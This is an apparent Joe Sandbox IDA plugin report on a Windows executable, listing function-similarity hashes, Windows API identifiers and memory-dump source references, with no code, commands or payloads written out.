• API String ID: 3118131910-0
• Opcode ID: 0ffd8ab98259af01e549e4e209d38ba10793117fd38bdfbcba967ce90f97429d
• Instruction ID: 93b09588fcecc9588f5584a25f1e48857bbc96f57e25520b582ced7acabceba6
• Opcode Fuzzy Hash: 0ffd8ab98259af01e549e4e209d38ba10793117fd38bdfbcba967ce90f97429d
• Instruction Fuzzy Hash: AF21C522A1CB81D1EA20AB24FC5422FA360FF88BD4F904235EADD43A99DF3DD551C710
APIs
Similarity
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1203560049-0
• Opcode ID: d2d5bb6998dcaffb369a501a3cf8d8e8aac5dce102f658295e0fffcdaf9a65bf
• Instruction ID: 478860500f3eab35d9fedbf42cae8529395e63ae03ccd442b035f01612fc1412
• Opcode Fuzzy Hash: d2d5bb6998dcaffb369a501a3cf8d8e8aac5dce102f658295e0fffcdaf9a65bf
• Instruction Fuzzy Hash: C0215632A1CB8591EA10AB28F85422EE361FF89BA4F940235EAAD43795DF3DD541C714
APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
• Instruction ID: f96446f48bdd0a5dcbfa60472fa31823ad422eec8d254353bd4b20f353495576
• Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
• Instruction Fuzzy Hash: B9E04F20B0834682EF247B319C9577A6762DF84741F54583CCC4E43396CF3EE8488271
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: vector too long
• API String ID: 3668304517-2873823879
• Opcode ID: 920f152083481ae005a5a79d005cbb5739c33784bc905db2e3eb9d35f49b6c22
• Instruction ID: 187e6e740624ca248f2a7e43ca0686a7c558d7d45def93c6c6ee9c70de614152
• Opcode Fuzzy Hash: 920f152083481ae005a5a79d005cbb5739c33784bc905db2e3eb9d35f49b6c22
• Instruction Fuzzy Hash: 0C61B272A1878196E700AB60DC802AEB7B4FF84758F545239EA8D07BA5DF7DE490C710
APIs
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 150d73363a9e39c99f3ded71800b8e520429e3335ab01881fa2be423d2bc2c13
• Instruction ID: 5c67bff6a795863666276738a52e89f3b09c6d6f0e4312ec0a3beb8818a87f34
• Opcode Fuzzy Hash: 150d73363a9e39c99f3ded71800b8e520429e3335ab01881fa2be423d2bc2c13
• Instruction Fuzzy Hash: 92719272B24A4195FB00EB64DC442AEB366EF54798F900236DA2D077D9DF3DE441C324
APIs
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
• Instruction ID: c03616edfe053f1257c3f34eca550059e1ed423b1214595b9751a1384fc0cd32
• Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
• Instruction Fuzzy Hash: 62310122B1D69252EA746B2ADD806BAA254FF04BD4F840131DF2D47B94DF3FE8418720
APIs
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$CloseFind
• String ID:
• API String ID: 3587649625-0
• Opcode ID: 20175d427c32e94b65b14eb522f67906f9b48ab8bab1200a0ddc17ac7add8826
• Instruction ID: f0413e6e76966b60e7aaf16411a236d27e040dcee9a8f59d6a52b3e45a9a8cb7
• Opcode Fuzzy Hash: 20175d427c32e94b65b14eb522f67906f9b48ab8bab1200a0ddc17ac7add8826
• Instruction Fuzzy Hash: 6841D222F14B8595FB14AB68D8413ADB366FF487A8F900235DE6C13BD9DF799440C354
APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1746051919-0
                                                                                                                                                                          • Opcode ID: 736d537b3c063294d9cf34c2cbe03750f0e101bfe69a453e156390386c11d36b
                                                                                                                                                                          • Instruction ID: 247fa1efd92e0bfdd570e4735ba2491c5fab4bf2baa7dd4dcaa93139f5f4c53a
                                                                                                                                                                          • Opcode Fuzzy Hash: 736d537b3c063294d9cf34c2cbe03750f0e101bfe69a453e156390386c11d36b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3831B022A1D781A1EA10AB25E8553AEF3A1EF847D0F984235EB9C07BD5DF3EE440C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$BuffersFlushTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1392018926-0
                                                                                                                                                                          • Opcode ID: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                          • Instruction ID: 0e4fbfbb67e4757c9a01f8521ca85ded93cebad83a92894f57c557417088e1ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
                                                                                                                                                                          • Instruction Fuzzy Hash: 2921ED22F0E78665EAAAAB11D8013BBA790BF81794F994131CF5C06395EF3FD586C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                          • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                          • Instruction ID: 8f7e16ae1d8b2fa86f51b445c67728423e62d3375354a2b6f9d38a8d2f795eec
                                                                                                                                                                          • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                                                                                                                                                          • Instruction Fuzzy Hash: E41173B5B08B418AEA54AB2AED40069F7A1EF98FC0BD4453ADE5C83320EF3DE5518354
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                          • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                          • Instruction ID: 801aef74461db6be8af82d31013c5b6b0f25786c1606ab0a979fc6623ab5d20a
                                                                                                                                                                          • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                                                                                                                                                          • Instruction Fuzzy Hash: 4811A521A1C64292EB64AB25E8803BAA360FF45BA4F944331EB7D536D4DF3ED592C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemRectTextWindow$Clientswprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3322643685-0
                                                                                                                                                                          • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                          • Instruction ID: 0e47088b0f8f9d14c244e045aca0600120a47412af49bc35b1f13800515cea1b
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                                                                                                                                                          • Instruction Fuzzy Hash: F1015E24F0D34A91FF5D7762AD442BA9391AF45B44F884035DD4D072A9EF2FE9858320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                          • Opcode ID: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                          • Instruction ID: fecde82a8daf0b2617da7c52952c084fe74cc69b6413e06966ef9ef86f75124a
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                                                                                                                                                          • Instruction Fuzzy Hash: E6E0C210F0D24352FF18BBF39C143799290DF98B41F8C8830C94DD7292EF2CA4854220
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareString_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1017591355-0
• Opcode ID: 430d939a93e2044b0e1e3d9942c44c20aa3ee0a929bfcd53dbd863392709a890
• Instruction ID: 95021dec2f9524fca0d5fcf746abd3bd2834ecac6b099c18975ead7cbd8b2375
• Opcode Fuzzy Hash: 430d939a93e2044b0e1e3d9942c44c20aa3ee0a929bfcd53dbd863392709a890
• Instruction Fuzzy Hash: 1961E311E1C64761FA64BA268C152BBE291AF44BD4FD48136EE8E076C6EF3FE451C231
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 8b0c66916c3ebf02a7a7365df98f3750845a28750ae82fa8124e9099153cf43a
• Instruction ID: 73be2c51708b49a715dd486c28ba8fa3ffada257e89653f52de60800e5f756c1
• Opcode Fuzzy Hash: 8b0c66916c3ebf02a7a7365df98f3750845a28750ae82fa8124e9099153cf43a
• Instruction Fuzzy Hash: CB71C122F18A52A5FB14EB65DC512BEB362BF44798F904131DD2E437D9DF3DE4409220
APIs
  • Part of subcall function 00007FF70ECD6288: FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE79DB
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: CloseFind_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1011579015-0
• Opcode ID: 8cd53635dd342b9d8534c31d426f8ae7889e06c83b9fc669b72276e432744b53
• Instruction ID: 525bfbe9e5be1e18ac8f91f24a1ae952871976701c99d24d956e3bc899d88c8a
• Opcode Fuzzy Hash: 8cd53635dd342b9d8534c31d426f8ae7889e06c83b9fc669b72276e432744b53
• Instruction Fuzzy Hash: 6B816831E0CB83A1FA60BB25EC5027AB391FF94758F94013AD99C433A5DF6EE8409361
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: a61f248b0a9ccd8a01cd042c2d40adab81ea10875d31861c1f1888002f278d03
• Instruction ID: 03204d51ad8a8559df07e67c1642e5a698905ec6e6e8a87b41f74f1b5861ddc8
• Opcode Fuzzy Hash: a61f248b0a9ccd8a01cd042c2d40adab81ea10875d31861c1f1888002f278d03
• Instruction Fuzzy Hash: DD615421B1C68261EA60FB14EC952FEF290EFD4748F804175D98D47BE9DF7EE5809620
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 36e23dbdec53020b1f835f80291cc46b6cf2a46ea1917f098bf880c412ad1992
• Instruction ID: 5a65f343ff01a3ec0b49147200cd09a0cf3fd9acb0e1f50bd66c2e641fa935e8
• Opcode Fuzzy Hash: 36e23dbdec53020b1f835f80291cc46b6cf2a46ea1917f098bf880c412ad1992
• Instruction Fuzzy Hash: 0C41DF22A0CB4590EE14AB24D95537FA3A1EF44BD8F940134EA5D477A9EF3FE442C660
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
• Instruction ID: 834f6fa0254b2ac2620fbd65c83b92bf012167c3de7d9ca746b8d5c429d816ac
• Opcode Fuzzy Hash: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
• Instruction Fuzzy Hash: 61419121F1978392FB25BB259CA037AA691EF44740FC8543AD94D87791DF3EE8448360
APIs
  • Part of subcall function 00007FF70ECD6288: FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE5023
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: CloseFind_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1011579015-0
• Opcode ID: 84bb52c91770d470c5ce8fb11b36b646ca4ef6c9421ba636b31e3e2a86012136
• Instruction ID: 438ad9d6503e63a058e187210686a62c1869d6d7091faf20e38983363ba67a28
• Opcode Fuzzy Hash: 84bb52c91770d470c5ce8fb11b36b646ca4ef6c9421ba636b31e3e2a86012136
• Instruction Fuzzy Hash: 5B318121B18B8691EA18BB15EC5537AF3A1FF84BD4F840135EAAD07B95CF3EE4418320
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                          • Instruction ID: 38b01ceb8d24becea6887f52a9ca153a4f2fe8988de36d50afda20a13e3394a4
                                                                                                                                                                          • Opcode Fuzzy Hash: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5111513691C68282F611AF159C44B79E6A4FF81384FD90535E7AD87B92DF7CE81087A0
APIs
  • Part of subcall function 00007FF70ECF2BF4: GetDlgItem.USER32 ref: 00007FF70ECF2C33
  • Part of subcall function 00007FF70ECF2BF4: ShowWindow.USER32 ref: 00007FF70ECF2C59
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2C6E
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2C86
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2CA7
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2CC3
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D06
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D24
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D38
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D62
  • Part of subcall function 00007FF70ECF2BF4: SendMessageW.USER32 ref: 00007FF70ECF2D7A
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECF3807
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1587882848-0
APIs
  • Part of subcall function 00007FF70ECD647C: FindFirstFileW.KERNELBASE ref: 00007FF70ECD64CB
  • Part of subcall function 00007FF70ECD647C: FindFirstFileW.KERNELBASE ref: 00007FF70ECD651E
  • Part of subcall function 00007FF70ECD647C: GetLastError.KERNEL32 ref: 00007FF70ECD656F
• FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
Similarity
• API ID: Find$FileFirst$CloseErrorLast
• String ID:
• API String ID: 1464966427-0
APIs
Similarity
• API ID: ItemMessageSend
• String ID:
• API String ID: 3015471070-0
APIs
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
APIs
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
APIs
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
APIs
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
